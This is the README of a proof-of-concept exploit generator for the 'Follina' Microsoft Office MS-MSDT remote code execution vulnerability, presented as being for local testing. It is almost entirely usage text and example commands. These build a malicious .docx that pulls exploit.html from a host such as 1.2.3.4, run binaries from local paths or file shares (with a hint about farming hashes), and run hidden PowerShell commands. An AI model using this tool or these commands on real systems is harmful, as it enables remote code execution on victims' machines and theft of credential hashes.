'Follina' MS-MSDT n-day Microsoft Office RCE
Quick POC to replicate the 'Follina' Office RCE vulnerability for local testing purposes. Running the script will generate the clickme.docx
payload file in your current working directory, and start a web server with the payload file (www/exploit.html
). The payload and web server parameters are configurable (see examples).
⚠ DO NOT USE IN PRODUCTION LEST YOU BE REGARDED A DUMMY
Usage:
python .\follina.py -h
usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] [-u URL] [-H HOST] [-p PORT]
options:
-h, --help show this help message and exit
Required Arguments:
-m {command,binary}, --mode {command,binary}
Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command
Binary Execution Arguments:
-b BINARY, --binary BINARY
Command Execution Arguments:
-c COMMAND, --command COMMAND
The encoded command to execute in "command" mode
Optional Arguments:
-u URL, --url URL The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"
-H HOST, --host HOST The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
-p PORT, --port PORT The port to run the HTTP server on, defaults to 80
Examples:
# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe
# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe
# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe
# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"
# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4
# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080
Cool peeps
Thanks to Kevin Beaumont for his original analysis of the issue, @KevTheHermit for sharing their poc, and John Hammond for their further work on analysing payload requirements. Additional thanks to @mkolsek for the template supporting Office 2019, and @theluemmel for sharing their version of the payload with me.